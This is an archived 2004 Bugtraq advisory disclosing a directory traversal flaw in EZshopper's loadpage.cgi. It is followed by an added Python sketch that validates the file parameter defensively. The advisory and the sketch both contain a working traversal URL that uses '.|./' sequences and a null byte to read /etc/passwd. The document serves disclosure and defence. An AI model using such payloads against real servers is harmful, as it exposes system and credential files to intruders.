[37510] in bugtraq


EZshopper is still vulnerable against Directory Traversal.

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Thu Nov 25 14:53:14 2004

Date: 25 Nov 2004 15:33:22 -0000
Message-ID: <20041125153322.5934.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com



Product: EZshopper
Versions: all
URL: www.ahg.com
Vulnerability: Directory Traversal
Date: November 25, 2004
Discovered by: Zero X <Zero_X@excluded.org>


loadpage.cgi of EZshopper allows Directory Traversal


Example:
http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html


- Zero X
- http://www.excluded.org
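
A defensive sketch of how a `file` parameter like the one in the example URL above can be validated before any file is opened. It is an added example, not part of the original post and not EZshopper code. The function names, the `.html`-only rule and the page directory `/srv/shop/pages` are assumptions made for illustration.

```python
import os
from urllib.parse import parse_qs, urlsplit

# Allow-list for one plain page name: no '/', '\\', '|' or control characters.
SAFE_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-.")

class RejectedPath(ValueError):
    """Raised when a requested page name must not be opened."""

def resolve_page(base_dir, raw_value):
    """Return the absolute path of a page inside base_dir or raise RejectedPath."""
    # 1. A NUL byte ends the path in C-backed file APIs, so "x\0.html"
    #    passes a suffix check and still opens "x".
    if "\x00" in raw_value:
        raise RejectedPath("NUL byte in file name")
    # 2. Refuse unexpected characters instead of stripping them: removing
    #    '|' from ".|./" after a "../" check would recreate "../".
    if not raw_value or any(c not in SAFE_CHARS for c in raw_value):
        raise RejectedPath("character outside allow-list")
    if raw_value.startswith(".") or not raw_value.endswith(".html"):
        raise RejectedPath("not a page name")
    # 3. Canonicalise last, then verify containment (also covers symlinks).
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, raw_value))
    if os.path.commonpath([base, target]) != base:
        raise RejectedPath("resolves outside page directory")
    return target

def file_param(url):
    """Extract the percent-decoded `file` value; %00 arrives as a real NUL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("file", [""])[0]

def check(url, base_dir):
    """Return ("ok", path) or ("rejected", reason) for a request URL."""
    try:
        return ("ok", resolve_page(base_dir, file_param(url)))
    except RejectedPath as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    pages = "/srv/shop/pages"  # hypothetical page directory
    host = "http://targethost/cgi-bin/loadpage.cgi?user_id=id&file="
    # First value is the one from the post; the second is constructed.
    for name in (".|./.|./.|./.|./.|./etc/passwd%00.html", "index.html"):
        print(name, "->", check(host + name, pages))
```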
